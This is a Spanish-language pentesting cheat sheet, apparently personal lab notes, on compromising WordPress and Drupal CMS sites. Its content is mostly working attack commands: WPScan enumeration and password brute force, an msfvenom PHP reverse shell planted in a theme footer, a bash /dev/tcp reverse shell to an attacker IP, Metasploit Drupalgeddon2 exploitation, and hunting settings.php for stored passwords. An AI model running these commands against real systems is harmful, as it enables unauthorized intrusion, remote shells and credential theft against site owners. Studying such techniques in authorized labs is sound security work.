Hacking Entornos CMS

Hacking en Entornos WordPress

Cuando nos encontremos que la página se ve algo mal debemos apuntar la IP de la máquina víctima al dominio de WordPress en el archivo /etc/hosts.

Hay que encontrar el panel de Login es decir con el archivo wp-login.php. Usamos la herramienta WPscan que nos permite realizar una auditoría de este CMS y poder enumerar tanto plugins vulnerables como usuarios existentes.

wpscan --url http://<IP máquina víctima>/blog --enumerate u,vp

Al obtener el usuario admin hacemos fuerza bruta para obtener la contraseña.

wpscan --url http://<IP máquina víctima>/blog --passwords /usr/share/wordlists/rockyou.txt --usernames admin

Ir al apartado Appearance y a Theme Footer y pegamos el payload. Pegamos el contenido del payload generado por msfvenom.

msfvenom -p /php/reverse_php LHOST=<OP máquina atacante> LPORT=443 -f raw > pwned.php

Y nos ponemos en escucha.

nc -nlvp 443

Ganamos acceso pero nos tenemos que mandar otra nueva conexión porque sino la perdemos.

nc -nlvp 4444 #nos ponemos en escucha
bash -c "sh -i >& /dev/tcp/192.168.1.50/4444 0>&1"

Hacking en Entornos Drupal – PARTE 1

Drupal es un CMS muy utilizado a día de hoy, tratándose de una alternativa a WordPress, por lo que también existen técnicas de explotación y vulnerabilidades en este tipo de CMS. Tenemos que ver que versión de Drupal tenemos.

msfconsole
search drupal 7 #druppalgeddon2
use 1
show options
set RHOSTS http://<IP máquina víctima>/drupal-7.57/
run

En meterpreter.

shell
bash -i

Hacking en Entornos Drupal – PARTE 2

Para ver la versión.

whatweb http://IP/

Explotar la vulnerabilidad.

msfconsole
search drupal 8
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS <IP máquina víctima>
exploit

En meterpreter.

shell 
bash -i
find / -name settings.php 2>/dev/null
# Hacer un cat del archivo para ver si hay contraseñas.

Nota: Tener en cuenta el archivo settings.php

Last updated

Was this helpful?